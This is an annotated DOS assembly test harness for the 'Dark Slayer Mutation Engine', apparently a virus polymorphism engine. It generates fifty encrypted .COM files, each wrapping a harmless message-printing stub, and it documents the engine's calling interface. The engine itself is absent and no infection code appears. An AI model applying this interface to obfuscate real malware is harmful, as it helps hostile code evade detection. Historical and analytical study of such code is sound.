; Dark Slayer Mutation Engine v1.0
; Written by Dark Slayer in Taiwan
;
; DSME_GEN - test-file generator for the DSME engine, which is linked in as
; the external symbols DSME / DSME_END (the engine itself is not in this file).
; Builds 50 small .COM files; for each one it calls DSME once on the code
; between PROC_START and PROC_END and writes the engine's output
; (decryptor + encrypted copy of that code) to disk.
; MASM syntax, 16-bit real-mode DOS, assembled as a .COM (ORG 0100h, CS = DS
; at entry). No DOS call result (carry flag / byte count) is checked anywhere,
; so a failed create, write or close is silently ignored.
DSME_GEN SEGMENT
ASSUME CS:DSME_GEN,DS:DSME_GEN
ORG 0100h                               ; .COM image: code starts at 0100h, right after the PSP
MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0005h ; distance from the POP DX inside PROC_START
                                        ; (5 bytes in) to MSG; PROC_START uses it to find
                                        ; MSG wherever the stub is loaded
EXTRN DSME:NEAR,DSME_END:NEAR           ; engine entry point and end-of-engine label,
                                        ; resolved by the linker from the DSME object
; (original author's note here was in Chinese; it is garbled in this copy)
; you may get some information as following remarks
;
START:
MOV AH,09h                              ; DOS: print '$'-terminated string at DS:DX
MOV DX,OFFSET DG_MSG
INT 21h
MOV AX,OFFSET DSME_END+000Fh            ; end of this program + DSME, rounded up to a paragraph
                                        ; (the OFFSET already includes the 0100h load offset)
; This program + DSME+000Fh address
; Minus 0100h = this program + DSME
; length
MOV CL,04h
SHR AX,CL                               ; AX >>= 4: bytes -> paragraphs (shift count must be in CL on 8086)
MOV BX,CS
ADD BX,AX
MOV ES,BX                               ; ES = first paragraph past the loaded image;
                                        ; DSME places its decryptor + encrypted code there
; Setting ES to put decryptor and encrypted
; code.
; Decryptor maxium is 1024 bytes
; You should notice the allocation of memory
; size when you use DSME in resident mode.
MOV CX,50                               ; number of files to generate (outer loop counter)
DG_L0:
PUSH CX                                 ; CX is clobbered below (DSME length / write count)
MOV AH,3Ch                              ; DOS: create or truncate file, name at DS:DX
XOR CX,CX                               ; attribute 0 = normal file
MOV DX,OFFSET FILE_NAME                 ; "00000000.COM" .. "00000049.COM" (FILE_NAME + FILE_NUM)
INT 21h                                 ; carry not checked: on failure AX holds an error code, not a handle
XCHG BX,AX                              ; BX = file handle
MOV BP,0100h                            ; DSME in: BP = offset at which the decryptor will run
                                        ; (0100h for a .COM target)
; Offset where the decryption routine
; will be executed
; It depends on which kinds of files
; COM or EXE?
MOV CX,OFFSET PROC_END-OFFSET PROC_START ; DSME in: CX = length of the code to encrypt
; encrypted code
; length
MOV DX,OFFSET PROC_START                ; DSME in: DS:DX -> code to encrypt
; DS:DX -> Encrypted code's
; address
PUSH BX                                 ; keep the file handle across the engine call
; keep File handle
MOV BL,00h                              ; DSME in: BL = 0 selects COM mode
; COM mode
CALL DSME                               ; external engine; contract on entry/return is described above/below
POP BX                                  ; BX = file handle again
MOV AH,40h                              ; DOS: write CX bytes from DS:DX to handle BX
INT 21h                                 ; DS:DX and CX are taken straight from DSME's return values;
                                        ; neither carry nor the written byte count is checked
; When returning from DSME,
; DS:DX = decryptor + encrypted code's address
; CX = length of decryptor + encrypted code
; Other registers won't be changed.
MOV AH,3Eh                              ; DOS: close handle BX
INT 21h
PUSH CS
POP DS                                  ; DS = CS again (DSME returns with DS:DX pointing at its output)
; restore DS
MOV BX,OFFSET FILE_NUM                  ; BX -> the two ASCII counter digits of the file name
INC BYTE PTR DS:[BX+0001h]              ; bump the low digit
CMP BYTE PTR DS:[BX+0001h],'9'
JBE DG_L1                               ; still '0'..'9': name is ready for the next file
INC BYTE PTR DS:[BX]                    ; carry into the high digit ...
MOV BYTE PTR DS:[BX+0001h],'0'          ; ... and wrap the low digit back to '0'
DG_L1:
POP CX                                  ; outer loop counter
LOOP DG_L0
MOV AH,4Ch                              ; DOS: terminate process (return code = whatever is in AL)
INT 21h
FILE_NAME DB '000000'                   ; with FILE_NUM directly after it: NUL-terminated "00000000.COM"
FILE_NUM DB '00.COM',00h                ; leading two digits are incremented once per file
DG_MSG DB 'Generates 50 DSME encrypted test files.',0Dh,0Ah,'$'
PROC_START:                             ; --- code handed to DSME: position-independent "print MSG, exit" stub ---
MOV AH,09h                              ; DOS: print string at DS:DX
CALL $+0003h                            ; call the very next instruction: pushes its own address ...
POP DX                                  ; ... so DX = runtime offset of this POP (2-byte MOV + 3-byte CALL = 5 in)
ADD DX,MSG_ADDR                         ; DX += MSG-PROC_START-5  ->  runtime offset of MSG
INT 21h
INT 20h                                 ; terminate (legacy .COM exit)
MSG DB 'this is <DSME> test file.$'
PROC_END:
DSME_GEN ENDS
END START                               ; entry point